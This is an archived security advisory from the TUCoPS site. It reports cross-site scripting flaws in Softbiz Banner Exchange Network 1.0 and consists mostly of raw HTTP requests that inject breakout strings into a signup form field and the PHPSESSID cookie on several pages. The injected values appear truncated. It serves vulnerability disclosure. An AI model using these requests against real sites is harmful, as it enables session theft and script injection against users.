TUCoPS :: Web :: Apps :: b06-3365.htm

Softbiz Banner Exchange 1.0 XSS
Softbiz Banner Exchange 1.0 XSS
Softbiz Banner Exchange 1.0 XSS


Softbiz Banner Exchange Network 1.0=0D
http://softbizscripts.com=0D 
--------------------------=0D
Cross Site Scripting (XSS)=0D
--------------------------=0D
POST http://target.xx:80/insertmember.php HTTP/1.0=0D 
Accept: */*=0D
Content-Type: application/x-www-form-urlencoded=0D
Host: target.xx=0D
Content-Length: 152=0D
uname=1&add=1&city=">&state=1&country=0&url=http%3A%2F%2F&email=1&pwd=1&pwd2=1&submit=Signup=0D
---=0D
GET http://target.xx:80/lostpassword.php HTTP/1.0=0D 
Accept: */*=0D
Host: target.xx=0D
Cookie: PHPSESSID=">=0D
---=0D
GET http://target.xx:80/gen_confirm_mem.php HTTP/1.0=0D 
Accept: */*=0D
Host: target.xx=0D
Cookie: PHPSESSID=">=0D
---=0D
GET http://target.xx:80/index.php HTTP/1.0=0D 
Accept: */*=0D
Host: target.xx=0D
Cookie: PHPSESSID=">=0D
-----------------=0D
Ellipsis Security=0D
http://ellsec.org

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH